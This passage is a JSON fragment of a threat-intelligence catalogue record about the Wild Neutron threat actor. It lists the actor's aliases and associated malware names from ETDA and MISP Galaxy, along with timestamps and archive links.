			"aliases": [
				"Butterfly",
				"Morpho",
				"Sphinx Moth",
				"The Postal Group",
				"Wild Neutron"
			],
			"source_name": "ETDA:Wild Neutron",
			"tools": [
				"HesperBot",
				"Jiripbot",
				"JripBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a653b7ac-97b5-465b-98cd-8713223b06a7",
			"created_at": "2023-01-06T13:46:38.592385Z",
			"updated_at": "2026-04-10T02:00:03.032867Z",
			"deleted_at": null,
			"main_name": "WildNeutron",
			"aliases": [
				"Morpho",
				"Sphinx Moth"
			],
			"source_name": "MISPGALAXY:WildNeutron",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775441566,
	"ts_updated_at": 1775792153,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/04782375b790b045df57c2ae4e91d69911a58dfa.pdf",
		"text": "https://archive.orkl.eu/04782375b790b045df57c2ae4e91d69911a58dfa.txt",
		"img": "https://archive.orkl.eu/04782375b790b045df57c2ae4e91d69911a58dfa.jpg"
	}
}